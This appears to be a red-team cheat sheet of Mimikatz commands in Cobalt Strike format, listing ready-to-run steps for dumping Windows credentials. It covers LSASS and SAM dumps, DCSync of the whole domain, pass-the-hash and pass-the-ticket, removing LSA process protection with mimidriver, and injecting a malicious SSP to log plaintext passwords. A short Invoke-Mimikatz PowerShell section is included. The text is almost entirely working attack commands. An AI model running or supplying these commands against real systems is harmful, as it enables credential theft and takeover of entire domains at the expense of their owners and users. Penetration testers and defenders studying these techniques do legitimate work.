mimikatz

#The commands are in cobalt strike format!

#Dump LSASS:
mimikatz privilege::debug
mimikatz token::elevate
mimikatz sekurlsa::logonpasswords

#(Over) Pass The Hash
mimikatz privilege::debug
mimikatz sekurlsa::pth /user:<UserName> /ntlm:<> /domain:<DomainFQDN>

#List all available kerberos tickets in memory
mimikatz sekurlsa::tickets

#Dump local Terminal Services credentials
mimikatz sekurlsa::tspkg

#Dump and save LSASS in a file
mimikatz sekurlsa::minidump c:\temp\lsass.dmp

#List cached MasterKeys
mimikatz sekurlsa::dpapi

#List local Kerberos AES Keys
mimikatz sekurlsa::ekeys

#Dump SAM Database
mimikatz lsadump::sam

#Dump SECRETS Database
mimikatz lsadump::secrets

#Inject and dump the Domain Controler's Credentials
mimikatz privilege::debug
mimikatz token::elevate
mimikatz lsadump::lsa /inject

#Dump the Domain's Credentials without touching DC's LSASS and also remotely
mimikatz lsadump::dcsync /domain:<DomainFQDN> /all

#Dump old passwords and NTLM hashes of a user
mimikatz lsadump::dcsync /user:<DomainFQDN>\<user> /history

#List and Dump local kerberos credentials
mimikatz kerberos::list /dump

#Pass The Ticket
mimikatz kerberos::ptt <PathToKirbiFile>

#List TS/RDP sessions
mimikatz ts::sessions

#List Vault credentials
mimikatz vault::list

❗ What if mimikatz fails to dump credentials because of LSA Protection controls ?

  • LSA as a Protected Process (Kernel Land Bypass)

    #Check if LSA runs as a protected process by looking if the variable "RunAsPPL" is set to 0x1
    reg query HKLM\SYSTEM\CurrentControlSet\Control\Lsa
    
    #Next upload the mimidriver.sys from the official mimikatz repo to same folder of your mimikatz.exe
    #Now lets import the mimidriver.sys to the system
    mimikatz # !+
    
    #Now lets remove the protection flags from lsass.exe process
    mimikatz # !processprotect /process:lsass.exe /remove
    
    #Finally run the logonpasswords function to dump lsass
    mimikatz # sekurlsa::logonpasswords
  • LSA as a Protected Process (Userland "Fileless" Bypass)

  • LSA is running as virtualized process (LSAISO) by Credential Guard

    #Check if a process called lsaiso.exe exists on the running processes
    tasklist |findstr lsaiso
    
    #If it does there isn't a way tou dump lsass, we will only get encrypted data. But we can still use keyloggers or clipboard dumpers to capture data.
    #Lets inject our own malicious Security Support Provider into memory, for this example i'll use the one mimikatz provides
    mimikatz # misc::memssp
    
    #Now every user session and authentication into this machine will get logged and plaintext credentials will get captured and dumped into c:\windows\system32\mimilsa.log
    ```
    
- [Detailed Mimikatz Guide](https://adsecurity.org/?page_id=1821)
- [Poking Around With 2 lsass Protection Options](https://medium.com/red-teaming-with-a-blue-team-mentaility/poking-around-with-2-lsass-protection-options-880590a72b1a)

## Mimikatz powershell

```powershell
PS C:\Tools> Set-ExecutionPolicy Bypass -Scope CurrentUser -Force
PS C:\Tools> Import-Module .\Invoke-Mimikatz.ps1
PS C:\Tools> Invoke-Mimikatz -Command '"lsadump::dcsync /user:lab\Administrator"'

Last updated